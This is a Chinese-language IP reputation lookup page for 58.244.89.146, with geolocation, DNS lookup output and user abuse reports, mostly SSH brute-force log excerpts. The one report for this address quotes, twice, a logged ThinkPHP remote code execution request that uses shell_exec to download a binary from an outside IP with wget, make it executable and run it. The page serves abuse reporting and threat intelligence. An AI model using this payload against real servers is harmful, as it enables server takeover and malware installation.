58.244.89.146 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Unicom Jilin Province Network

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackspam	58.244.89.146 - - \[21/Jun/2019:21:36:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://185.172.110.245/x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0" ...	2019-06-22 11:08:52

类型

评论内容

时间

attackspam

58.244.89.146 - - \[21/Jun/2019:21:36:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://185.172.110.245/x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
...

2019-06-22 11:08:52

相同子网IP讨论:

IP	类型	评论内容	时间
58.244.89.227	attackbotsspam	Automatic report - Port Scan Attack	2020-08-11 03:19:51

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 58.244.89.146
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1754
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;58.244.89.146.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019062200 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sat Jun 22 11:08:43 CST 2019
;; MSG SIZE  rcvd: 117

HOST信息:

146.89.244.58.in-addr.arpa domain name pointer 146.89.244.58.adsl-pool.jlccptt.net.cn.

NSLOOKUP信息:

;; Got SERVFAIL reply from 67.207.67.2, trying next server
Server:		67.207.67.3
Address:	67.207.67.3#53

Non-authoritative answer:
146.89.244.58.in-addr.arpa	name = 146.89.244.58.adsl-pool.jlccptt.net.cn.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
161.35.73.66	attackspam	Aug 28 16:13:53 vpn01 sshd[22731]: Failed password for root from 161.35.73.66 port 39968 ssh2 Aug 28 16:16:18 vpn01 sshd[22828]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=161.35.73.66 ...	2020-08-28 22:38:00
103.253.146.142	attack	Time: Fri Aug 28 15:11:55 2020 +0200 IP: 103.253.146.142 (SG/Singapore/-) Failures: 5 (sshd) Interval: 3600 seconds Blocked: Permanent Block [LF_SSHD] Log entries: Aug 28 15:01:44 mail-01 sshd[13722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.253.146.142 user=root Aug 28 15:01:46 mail-01 sshd[13722]: Failed password for root from 103.253.146.142 port 54704 ssh2 Aug 28 15:09:23 mail-01 sshd[14082]: Invalid user angel from 103.253.146.142 port 36653 Aug 28 15:09:25 mail-01 sshd[14082]: Failed password for invalid user angel from 103.253.146.142 port 36653 ssh2 Aug 28 15:11:50 mail-01 sshd[14188]: Invalid user cloud from 103.253.146.142 port 48354	2020-08-28 22:50:52
112.215.113.10	attackspam	Aug 28 12:27:01 game-panel sshd[7883]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.215.113.10 Aug 28 12:27:03 game-panel sshd[7883]: Failed password for invalid user user from 112.215.113.10 port 56031 ssh2 Aug 28 12:32:39 game-panel sshd[8120]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.215.113.10	2020-08-28 22:53:33
83.212.84.67	attack	Aug 28 16:11:20 vpn01 sshd[22571]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.212.84.67 Aug 28 16:11:23 vpn01 sshd[22571]: Failed password for invalid user cathy from 83.212.84.67 port 46612 ssh2 ...	2020-08-28 22:18:35
54.37.65.3	attackbotsspam	Aug 28 13:50:20 onepixel sshd[105683]: Invalid user sjd from 54.37.65.3 port 35782 Aug 28 13:50:20 onepixel sshd[105683]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.65.3 Aug 28 13:50:20 onepixel sshd[105683]: Invalid user sjd from 54.37.65.3 port 35782 Aug 28 13:50:22 onepixel sshd[105683]: Failed password for invalid user sjd from 54.37.65.3 port 35782 ssh2 Aug 28 13:54:20 onepixel sshd[106280]: Invalid user marisa from 54.37.65.3 port 42154	2020-08-28 22:47:04
69.174.91.39	attackspam	fell into ViewStateTrap:madrid	2020-08-28 22:32:58
112.172.192.14	attackspam	Aug 28 08:04:32 NPSTNNYC01T sshd[5787]: Failed password for root from 112.172.192.14 port 38064 ssh2 Aug 28 08:08:02 NPSTNNYC01T sshd[6130]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.172.192.14 Aug 28 08:08:03 NPSTNNYC01T sshd[6130]: Failed password for invalid user user from 112.172.192.14 port 57028 ssh2 ...	2020-08-28 22:17:12
167.172.145.230	attack	2020-08-28T14:01:52.878727shield sshd\[12363\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.145.230 user=root 2020-08-28T14:01:54.251876shield sshd\[12363\]: Failed password for root from 167.172.145.230 port 49424 ssh2 2020-08-28T14:05:30.925496shield sshd\[12635\]: Invalid user monica from 167.172.145.230 port 56020 2020-08-28T14:05:30.946387shield sshd\[12635\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.145.230 2020-08-28T14:05:33.583589shield sshd\[12635\]: Failed password for invalid user monica from 167.172.145.230 port 56020 ssh2	2020-08-28 22:13:42
223.197.151.55	attackbotsspam	Aug 28 10:01:47 ny01 sshd[6037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.197.151.55 Aug 28 10:01:48 ny01 sshd[6037]: Failed password for invalid user ood from 223.197.151.55 port 39894 ssh2 Aug 28 10:06:18 ny01 sshd[6600]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.197.151.55	2020-08-28 22:28:00
106.12.166.167	attackspam	Aug 28 14:05:46 root sshd[15349]: Failed password for root from 106.12.166.167 port 25023 ssh2 Aug 28 14:07:29 root sshd[15565]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.166.167 Aug 28 14:07:31 root sshd[15565]: Failed password for invalid user portal from 106.12.166.167 port 41863 ssh2 ...	2020-08-28 22:52:29
153.122.84.229	attackspambots	2020-08-28T12:03:38.111852abusebot-2.cloudsearch.cf sshd[17779]: Invalid user gu from 153.122.84.229 port 46268 2020-08-28T12:03:38.117892abusebot-2.cloudsearch.cf sshd[17779]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=lookdatabase.com 2020-08-28T12:03:38.111852abusebot-2.cloudsearch.cf sshd[17779]: Invalid user gu from 153.122.84.229 port 46268 2020-08-28T12:03:39.945107abusebot-2.cloudsearch.cf sshd[17779]: Failed password for invalid user gu from 153.122.84.229 port 46268 ssh2 2020-08-28T12:07:29.642360abusebot-2.cloudsearch.cf sshd[17788]: Invalid user postgres from 153.122.84.229 port 37932 2020-08-28T12:07:29.648284abusebot-2.cloudsearch.cf sshd[17788]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=lookdatabase.com 2020-08-28T12:07:29.642360abusebot-2.cloudsearch.cf sshd[17788]: Invalid user postgres from 153.122.84.229 port 37932 2020-08-28T12:07:31.522018abusebot-2.cloudsearch.cf sshd[17788] ...	2020-08-28 22:50:35
13.68.158.99	attack	Aug 28 16:27:08 vpn01 sshd[23420]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=13.68.158.99 Aug 28 16:27:10 vpn01 sshd[23420]: Failed password for invalid user lxw from 13.68.158.99 port 45828 ssh2 ...	2020-08-28 22:37:37
192.35.169.38	attackspam	Port scan: Attack repeated for 24 hours	2020-08-28 22:13:09
187.228.156.174	attackspam	Aug 28 15:59:48 abendstille sshd\[8908\]: Invalid user bamboo from 187.228.156.174 Aug 28 15:59:48 abendstille sshd\[8908\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=187.228.156.174 Aug 28 15:59:51 abendstille sshd\[8908\]: Failed password for invalid user bamboo from 187.228.156.174 port 40278 ssh2 Aug 28 16:03:07 abendstille sshd\[12324\]: Invalid user ftp123456 from 187.228.156.174 Aug 28 16:03:07 abendstille sshd\[12324\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=187.228.156.174 ...	2020-08-28 22:15:54
120.237.118.139	attack	Aug 28 15:30:56 vpn01 sshd[21548]: Failed password for root from 120.237.118.139 port 49442 ssh2 ...	2020-08-28 22:14:28

最近上报的IP列表

46.109.14.61	65.96.144.120	192.241.153.123	167.250.8.115
143.255.2.68	187.10.10.30	206.189.118.156	178.212.53.2
91.205.131.124	191.122.187.119	91.214.114.7	89.44.180.1
45.71.230.63	177.95.64.11	5.55.151.218	186.248.131.226
185.146.22.5	42.57.65.119	45.115.176.254	80.108.21.125